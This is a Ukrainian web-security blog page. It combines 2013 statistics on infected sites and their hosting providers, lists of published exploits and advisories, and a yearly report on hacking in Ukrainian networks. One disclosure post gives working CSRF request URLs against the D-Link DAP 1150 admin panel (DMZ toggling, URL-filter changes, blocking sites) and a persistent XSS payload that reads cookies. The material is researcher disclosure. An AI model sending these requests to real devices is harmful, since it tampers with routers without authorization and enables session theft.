Websecurity - Веб безпека

В своїх звітах про Інфіковані хостери в 1 півріччі 2013 року та Інфіковані хостери в 2 півріччі 2013 року я розповів, що в Уанеті було 130 інфікованих сайтів в першому півріччі та 96 інфікованих сайти в другому півріччі минулого року, і навів перелік хостерів, що хостили ці інфіковані сайти. А зараз наведу загальний перелік інфікованих хостерів за весь рік.

Всього в 2013 році було інфіковано 226 сайтів (виявлених мною). Всього було 81 провайдерів, що розміщували дані сайти.

Багато з цих хостінг провайдерів, робили це як в першому, так й другому півріччі минулого року (18 провайдерів), а деякі робили це і 2012 року. Тобто це в них звичайна практика. Цей звіт призначений для того, щоб і хостери і Інтернет користувачі знали найбільших розповсюджувачів шкідливого програмного забезпечення (через інфіковані сайти).

В минулому році наступні хостінг провайдери розміщували на своїх серверах інфіковані сайти: 1GB LLC, Avguro Technologies, Besthosting, Bizland, CHOOPA, Cityhost, Colocall, Compubyte Limited, Confluence Networks, CrimeaInfocom, DCTeL, DMedia, Datagroup, Delta-X, Digiq Net, Digital Ventures, Dream Line, FastVPS, Freehost, Golden Telecom, Goodnet, Hetzner, HostBizUa, HostLife, HostPro, Hosting.ua, Hvosting, ISPsystem, Info-center, Infocom, Intelex, Internet Communications, KHRSA, Keyweb Online, Kyivstar, LNUA, Langate, LeaseWeb, Mageal, Majorhost, Microsoft, MiroHost, Modus, NAU, Navigator Online, Net Access Corporation, PlusServer, Relink, Rusonyx, Server.ua, ServerSnab, Service Online, Shantyr, TW Telecom, TeNeT, The First, The Planet, TheHost, TimeWeb Co., TutHost, UA Servers, UARNet, UkrNet, Ukraine, Ukrainian Internet Names Center, Unlim, Uteam, VOLZ, VPS.ua, Velton Telecom, Vizor, Volia, Web-Com, Wnet, XServer, Xirra, eServer.ru, iPROsrv, iWeb, Мета, Укртелеком.

Найбільші інфіковані хостери (TOP-10):

1. Delta-X - 17 сайтів
2. Datagroup - 15 сайтів
3. Compubyte Limited - 15 сайтів
4. Besthosting - 12 сайтів
5. Hetzner - 11 сайтів
6. HostPro - 10 сайтів
7. Freehost - 9 сайтів
8. Wnet - 7 сайтів
9. MiroHost - 7 сайтів
10. Colocall - 5 сайтів

Всього було виявлено хостінги 218 сайтів з 226. У випадку інших 8 сайтів визначити хостінги не вдалося, тому що в даний момент ці сайти вже не працювали (вони явно були закриті через розміщення malware на цих ресурсах).

В даній добірці експлоіти в веб додатках:

• Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities (деталі)
• Oracle Demantra 12.2.1 - Arbitrary File Disclosure (деталі)
• Oracle Demantra 12.2.1 - SQL Injection Vulnerability (деталі)
• Mozilla Firefox 5-15 vulnerability Download and Execute (деталі)
• Linksys E-series Unauthenticated Remote Code Execution Exploit (деталі)

Продовжуючи тему уразливостей в D-Link DAP 1150. Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості в режимі роутера. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery, Abuse of Functionality та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.

Нагадаю, що в першому звіті про уразливості в D-Link DAP 1150, я писав про CSRF в формі логіна в адмінку пристрою та інші уразливості, що дозволяють віддалено входити в адмінку для проведення CSRF і XSS атак всередині адмінки.

CSRF (WASC-09):

В розділі Firewall / DMZ через CSRF можна змінювати налаштувань DMZ.

Включити DMZ:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=23&res_struct_size=0&res_buf={%22enable%22:true,%22ip%22:%22192.168.1.1%22}&res_pos=0

Виключити DMZ:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=23&res_struct_size=0&res_buf={%22enable%22:false,%22ip%22:%22%22}&res_pos=0

CSRF (WASC-09):

В розділі Control / URL-filter через CSRF можна додавати, редагувати та видаляти налаштування URL-фільтрів.

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://site%22,%20%22enable%22:%22ACCEPT%22}&res_pos=-1

Редагувати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://site%22,%20%22enable%22:%22ACCEPT%22}&res_pos=0

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_struct_size=0&res_config_id=58&res_pos=0

Abuse of Functionality (WASC-42):

Цей функціонал можна використати для блокування доступу користувачам роутера до сайтів. Заборонити доступ до google.com:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://google.com%22,%20%22enable%22:%22DROP%22}&res_pos=-1

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Control / URL-filter.

Атака через функцію додавання в параметрі res_buf:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22enable%22:%22%22}&res_pos=-1

28.02.2014

Виявлені численні уразливості безпеки в Apache Tomcat.

Уразливі версії: Apache Tomcat 7.0, Tomcat 8.0.

Витік інформації, DoS, фіксація сеансів.

• CVE-2013-4590 Information disclosure via XXE when running untrusted web applications (деталі)
• CVE-2013-4322 Incomplete fix for CVE-2012-3544 (Denial of Service) (деталі)
• CVE-2013-4286 Incomplete fix for CVE-2005-2090 (Information disclosure) (деталі)
• CVE-2014-0033 Session fixation still possible with disableURLRewriting enabled (деталі)

16.04.2014

Додаткова інформація.

• Apache Commons FileUpload and Apache Tomcat DoS (деталі)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://tiande-rivne-com-ua.1gb.ua - інфекція була виявлена 29.01.2014. Зараз сайт входить до переліку підозрілих.
• http://mignews.com.ua - інфекція була виявлена 18.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://mignews.com - інфекція була виявлена 18.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://weblog.com.ua - інфекція була виявлена 18.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://statuspress.com.ua - інфекція була виявлена 19.03.2014. Зараз сайт не входить до переліку підозрілих.

В даній добірці уразливості в веб додатках:

• Multiple vulnerabilities - Surveillance via Symantec Web Gateway (деталі)
• Cross-Site Scripting (XSS) in Jamroom (деталі)
• CSP MySQL User Manager v2.3 SQL Injection Authentication Bypass (деталі)
• Vulnerabilities in Apache Solr < 4.6.0 (деталі)
• Security Notice for CA Service Desk Manager (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Orange, Page Flip Image Gallery та DZS Video Gallery. Для котрих з’явилися експлоіти. Orange - це тема движка, Page Flip Image Gallery - це плагін для створення галереї зображень, DZS Video Gallery - це плагін для створення відео галереї.

• WordPress Orange Cross Site Request Forgery (деталі)
• WordPress Page Flip Image Gallery Shell Upload (деталі)
• WordPress DZS Video Gallery 3.1.3 Remote File Disclosure (деталі)

Стосовно DZS Video Gallery, то це не RFD, а Content Spoofing.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В своєму звіті Хакерська активність в Уанеті в 1 півріччі 2013 я навів дані про діяльність хакерів в Уанеті за період з 01.01.2013 по 30.06.2013, а в звіті Хакерська активність в Уанеті в 2 півріччі 2013 - дані за період з 01.07.2013 по 31.12.2013.

За весь 2013 рік в Уанеті було проведено 1100 атак на веб сайти - 724 за перше півріччя і 376 за друге. Для порівняння, за весь 2012 рік було зафіксовано всього 1142 атак на веб сайти. І це тільки виявлені мною випадки (і я ще не всі данні обробив), реальна кількість інцидентів може бути значно вищою.

Динаміка зростання хакерської активності за минулий рік: за перше півріччя 2013 активність більша на 7,4% в порівнянні з аналогічним періодом 2012 року, а за друге півріччя 2013 - на 20,7% менша за аналогічний період 2012 року. А в цілому в 2013 році активність впала на 3,7% порівняно з 2012 роком - спад в 1,04 рази.

В 2013 році загалом було атаковано 1100 веб ресурсів (як взломи, так і DDoS атаки), перелік яких ви можете знайти у відповідних звітах за перше і друге півріччя минулого року. А також були інфіковані 226 сайти, які вірогідно були похакані в 2013 році.

Головні тенденції 2013 року в діяльності хакерів в Уанеті:

• Хакерська активність дещо впала - на 3,7% порівняно з 2012 роком (зменшення динаміки у 1,04 рази).
• Багато сайтів в Уанеті заражуються вірусами: в 2012 я виявив 202 інфікованих сайтів, в 2013 - вже 226 сайтів (збільшення динаміки у 1,12 рази).
• Кількість DDoS атак на сайти менша ніж в 2012 році - 13 випадків DDoS атак за рік (зменшення у 3 рази). Це 1,2% від всіх атак за 2013 рік.
• Атаковано 149 державних сайтів та інфіковано ще 11 gov.ua-сайтів.
• Зменшення взломів державних сайтів в 1,15 рази та зменшення інфікування gov.ua-сайтів в 1,45 рази порівняно з 2012 роком.

Велика кількість заражених сайтів в Уанеті (в тому числі gov.ua-сайтів) свідчить про чималий відсоток кримінальних взломів сайтів.

Підсумовуючи скажу, що активність хакерів в минулому році була високою і вона продовжить такою бути. І в 2014 році ця тенденція збережеться.

В новому році очікуйте на нові звіти про хакерську активність в Уанеті.

Виявлені численні уразливості безпеки в cURL.

Уразливі версії: cURL 7.36.

Витік інформації, обхід перевірки сертифікатів.

• Vulnerabilities in curl (деталі)

В даній добірці експлоіти в веб додатках:

• Technicolor TC7200 - Credentials Disclosure Vulnerability (деталі)
• Private Camera Pro 5.0 iOS - Multiple Vulnerabilities (деталі)
• MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation (деталі)
• Pandora FMS Remote Code Execution Exploit (деталі)
• Kloxo SQL Injection / Remote Code Execution Exploit (деталі)